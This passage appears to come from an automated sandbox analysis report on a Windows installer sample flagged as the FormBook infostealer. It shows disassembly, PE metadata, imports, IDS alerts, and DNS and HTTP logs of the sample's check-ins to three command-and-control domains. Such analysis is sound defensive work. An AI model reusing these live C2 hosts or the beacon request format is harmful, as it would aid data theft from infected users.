                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 0040A130h
                                                                                      mov dword ptr [esp+20h], ebx
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [004080B0h]
                                                                                      call dword ptr [004080C0h]
                                                                                      and eax, BFFFFFFFh
                                                                                      cmp ax, 00000006h
                                                                                      mov dword ptr [0042F44Ch], eax
                                                                                      je 00007F1D44B738D3h
                                                                                      push ebx
                                                                                      call 00007F1D44B76A4Eh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738C9h
                                                                                      push 00000C00h
                                                                                      call eax
                                                                                      mov esi, 004082A0h
                                                                                      push esi
                                                                                      call 00007F1D44B769CAh
                                                                                      push esi
                                                                                      call dword ptr [004080B8h]
                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                      cmp byte ptr [esi], bl
                                                                                      jne 00007F1D44B738ADh
                                                                                      push 0000000Bh
                                                                                      call 00007F1D44B76A22h
                                                                                      push 00000009h
                                                                                      call 00007F1D44B76A1Bh
                                                                                      push 00000007h
                                                                                      mov dword ptr [0042F444h], eax
                                                                                      call 00007F1D44B76A0Fh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738D1h
                                                                                      push 0000001Eh
                                                                                      call eax
                                                                                      test eax, eax
                                                                                      je 00007F1D44B738C9h
                                                                                      or byte ptr [0042F44Fh], 00000040h
                                                                                      push ebp
                                                                                      call dword ptr [00408038h]
                                                                                      push ebx
                                                                                      call dword ptr [00408288h]
                                                                                      mov dword ptr [0042F518h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 00429878h
                                                                                      call dword ptr [0040816Ch]
                                                                                      push 0040A1ECh

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                      Data Directories

                                                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x19038 | .rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                      Sections

                                                                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                      .text | 0x1000 | 0x65ad | 0x6600 | False | 0.675628063725 | data | 6.48593060343 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4634765625 | data | 5.26110074066 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data | 0xa000 | 0x25558 | 0x600 | False | 0.470052083333 | data | 4.21916068772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc | 0x38000 | 0x19038 | 0x19200 | False | 0.341466495647 | data | 4.34524426272 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      Name | RVA | Size | Type | Language | Country
                                                                                      RT_ICON | 0x38298 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
                                                                                      RT_ICON | 0x48ac0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 1073807359, next used block 4294903552 | |
                                                                                      RT_ICON | 0x4cce8 | 0x25a8 | data | |
                                                                                      RT_ICON | 0x4f290 | 0x10a8 | data | |
                                                                                      RT_ICON | 0x50338 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                                                      RT_DIALOG | 0x507a0 | 0x100 | data | English | United States
                                                                                      RT_DIALOG | 0x508a0 | 0x11c | data | English | United States
                                                                                      RT_DIALOG | 0x509bc | 0x60 | data | English | United States
                                                                                      RT_GROUP_ICON | 0x50a1c | 0x4c | data | |
                                                                                      RT_VERSION | 0x50a68 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
                                                                                      RT_MANIFEST | 0x50cf8 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                      Imports

                                                                                      DLL | Import
                                                                                      ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                      SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                      ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                      COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                      USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                      GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                      KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                      Version Infos

                                                                                      Description | Data
                                                                                      LegalCopyright | Copyright shivering
                                                                                      FileVersion | 65.93.64.23
                                                                                      CompanyName | daf
                                                                                      LegalTrademarks | mist
                                                                                      Comments | crookback
                                                                                      ProductName | pinewood king bolete
                                                                                      FileDescription | Abkhazian (Latin script)
                                                                                      Translation | 0x0409 0x04e4

                                                                                      Possible Origin

                                                                                      Language of compilation system | Country where language is spoken | Map
                                                                                      English | United States |

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                      02/23/21-15:32:01.456680 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      02/23/21-15:32:01.456680 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      02/23/21-15:32:01.456680 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      02/23/21-15:32:01.600872 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49746 | 34.102.136.180 | 192.168.2.6
                                                                                      02/23/21-15:32:44.386288 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 111.221.46.49
                                                                                      02/23/21-15:32:44.386288 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 111.221.46.49
                                                                                      02/23/21-15:32:44.386288 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 111.221.46.49

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Feb 23, 2021 15:32:01.415462017 CET | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      Feb 23, 2021 15:32:01.456418991 CET | 80 | 49746 | 34.102.136.180 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.456542015 CET | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      Feb 23, 2021 15:32:01.456680059 CET | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      Feb 23, 2021 15:32:01.501941919 CET | 80 | 49746 | 34.102.136.180 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.600872040 CET | 80 | 49746 | 34.102.136.180 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.600924015 CET | 80 | 49746 | 34.102.136.180 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.601119041 CET | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      Feb 23, 2021 15:32:01.601254940 CET | 49746 | 80 | 192.168.2.6 | 34.102.136.180
                                                                                      Feb 23, 2021 15:32:01.642165899 CET | 80 | 49746 | 34.102.136.180 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.010490894 CET | 49752 | 80 | 192.168.2.6 | 168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.405154943 CET | 80 | 49752 | 168.206.81.138 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.405332088 CET | 49752 | 80 | 192.168.2.6 | 168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.405430079 CET | 49752 | 80 | 192.168.2.6 | 168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.799341917 CET | 80 | 49752 | 168.206.81.138 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.799669981 CET | 80 | 49752 | 168.206.81.138 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.799896002 CET | 49752 | 80 | 192.168.2.6 | 168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.800066948 CET | 49752 | 80 | 192.168.2.6 | 168.206.81.138
                                                                                      Feb 23, 2021 15:32:23.199253082 CET | 80 | 49752 | 168.206.81.138 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.193600893 CET | 49753 | 80 | 192.168.2.6 | 111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.385819912 CET | 80 | 49753 | 111.221.46.49 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.386015892 CET | 49753 | 80 | 192.168.2.6 | 111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.386287928 CET | 49753 | 80 | 192.168.2.6 | 111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.578690052 CET | 80 | 49753 | 111.221.46.49 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.603816986 CET | 80 | 49753 | 111.221.46.49 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.603853941 CET | 80 | 49753 | 111.221.46.49 | 192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.604140043 CET | 49753 | 80 | 192.168.2.6 | 111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.604228020 CET | 49753 | 80 | 192.168.2.6 | 111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.800883055 CET | 80 | 49753 | 111.221.46.49 | 192.168.2.6

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 15:30:40.467911959 CET | 54513 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:30:40.518728971 CET | 53 | 54513 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:30:43.022846937 CET | 62044 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:30:43.090131044 CET | 53 | 62044 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:11.082956076 CET | 63791 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:11.134610891 CET | 53 | 63791 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:11.895347118 CET | 64267 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:11.944017887 CET | 53 | 64267 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:12.847143888 CET | 49448 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:12.898746967 CET | 53 | 49448 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:13.631004095 CET | 60342 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:13.684792995 CET | 53 | 60342 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:14.428874016 CET | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:14.478703022 CET | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:15.570743084 CET | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:15.619601011 CET | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:16.335077047 CET | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:16.394454002 CET | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:16.494822025 CET | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:16.546437025 CET | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:17.261225939 CET | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:17.312848091 CET | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:18.038053989 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:18.086622953 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:19.267477036 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:19.319128990 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:20.657476902 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:20.706202984 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:21.828244925 CET | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:21.879611969 CET | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:26.449898958 CET | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:26.500972033 CET | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:27.526665926 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:27.579718113 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:28.497622013 CET | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:28.548201084 CET | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:29.678368092 CET | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:29.733423948 CET | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:30.844587088 CET | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:30.896049023 CET | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:36.151079893 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:36.217627048 CET | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:37.760253906 CET | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:37.809017897 CET | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:50.291194916 CET | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:50.353537083 CET | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:50.897938967 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:50.957060099 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:51.536858082 CET | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:51.594027996 CET | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:52.113111973 CET | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:52.159181118 CET | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:52.177457094 CET | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:52.217801094 CET | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:52.341439962 CET | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:52.408416033 CET | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:52.680592060 CET | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:52.731338024 CET | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:53.268157959 CET | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:53.330169916 CET | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:53.975930929 CET | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:54.027441025 CET | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:55.391679049 CET | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:55.441854954 CET | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:56.758450031 CET | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:56.818296909 CET | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:31:57.554359913 CET | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:31:57.616803885 CET | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:32:01.334067106 CET | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:32:01.410595894 CET | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:32:20.171560049 CET | 54683 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:32:20.223088980 CET | 53 | 54683 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:32:20.575880051 CET | 59329 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:32:20.635864973 CET | 53 | 59329 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:32:21.268004894 CET | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:32:21.325251102 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:32:21.792572975 CET | 56129 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:32:22.009269953 CET | 53 | 56129 | 8.8.8.8 | 192.168.2.6
Feb 23, 2021 15:32:43.900327921 CET | 58177 | 53 | 192.168.2.6 | 8.8.8.8
Feb 23, 2021 15:32:44.192182064 CET | 53 | 58177 | 8.8.8.8 | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 15:32:01.334067106 CET | 192.168.2.6 | 8.8.8.8 | 0xcf60 | Standard query (0) | www.thatlocaljawn.com | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:21.792572975 CET | 192.168.2.6 | 8.8.8.8 | 0xcc94 | Standard query (0) | www.warungsuntik.com | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:43.900327921 CET | 192.168.2.6 | 8.8.8.8 | 0x5f23 | Standard query (0) | www.tabandolano.online | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 15:32:01.410595894 CET | 8.8.8.8 | 192.168.2.6 | 0xcf60 | No error (0) | www.thatlocaljawn.com | thatlocaljawn.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 15:32:01.410595894 CET | 8.8.8.8 | 192.168.2.6 | 0xcf60 | No error (0) | thatlocaljawn.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:22.009269953 CET | 8.8.8.8 | 192.168.2.6 | 0xcc94 | No error (0) | www.warungsuntik.com | | 168.206.81.138 | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:44.192182064 CET | 8.8.8.8 | 192.168.2.6 | 0x5f23 | No error (0) | www.tabandolano.online | tabandolano.online | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 15:32:44.192182064 CET | 8.8.8.8 | 192.168.2.6 | 0x5f23 | No error (0) | tabandolano.online | | 111.221.46.49 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.thatlocaljawn.com
• www.warungsuntik.com
• www.tabandolano.online

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49746 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 15:32:01.456680059 CET | 6332 | OUT | GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1
Host: www.thatlocaljawn.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 15:32:01.600872040 CET | 6333 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 23 Feb 2021 14:32:01 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6031584e-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49752 | 168.206.81.138 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 15:32:22.405430079 CET | 6365 | OUT | GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1
Host: www.warungsuntik.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 15:32:22.799669981 CET | 6368 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 23 Feb 2021 14:32:22 GMT
Content-Type: text/html
Content-Length: 479
Connection: close
ETag: "601d0d01-1df"
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
